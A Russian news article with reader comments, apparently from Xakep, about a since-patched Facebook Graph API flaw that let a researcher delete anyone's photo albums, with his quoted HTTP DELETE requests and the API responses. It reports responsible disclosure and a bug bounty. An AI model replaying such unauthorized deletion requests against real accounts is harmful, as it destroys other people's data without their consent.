Facebook быстро закрыл уязвимость с удалением чужих фотоальбомов. Несмотря на простоту в реализации, компания выплатила автору баг-репорта Лаксману Мутьяху (Laxman Muthiyah) вознаграждение $12500.

Довольный автор рассказал в блоге, как он нашёл баг.

Парень экспериментировал с запросами через Graph API — программный интерфейс, через который приложения Facebook считывают и записывают информацию. У него было своё приложение и токен, с которыми он экспериментировал, пытаясь удалить свой собственный фотоальбом простым запросом DELETE.

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

С помощью обычного токена это сделать не удалось, зато получилось с помощью мобильного токена.

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=

Response :-
true

К удивлению автора, аналогичный запрос сработал и на удаление чужого фотоальбома. И вообще, на удаление любого фотоальбома на сайте Facebook.

За час своей работы автор получил заслуженный гонорар.

003

Facebook быстро закрыл баг, добавив четыре строчки кода, не считая скобок.

004

6 комментариев

  1. 13.02.2015 at 02:35

    xakep наконец исправил баг с отсутствием https

  2. 13.02.2015 at 05:33

    а «Хакер» когда уже исправит баг с удалением чужих фотоальбомов?

  3. 13.02.2015 at 10:32

    «Facebook исправил баг с удалением чужих фотоальбомов» — теперь они удаляются корректно. 🙂

  4. 13.02.2015 at 13:15

    Бред про четыре строчки кода. На скриншоте лишь json ответ, при попытке эксплуатации бага, после патча. Никакого отношения к легкости закрытия это не имеет.

  5. 16.02.2015 at 14:00

    Facebook быстро закрыл уязвимость с удалением чужих фотоальбомов.

    Вообще-то возможность удалять чужие фото бывает очень даже нужна.

Оставить мнение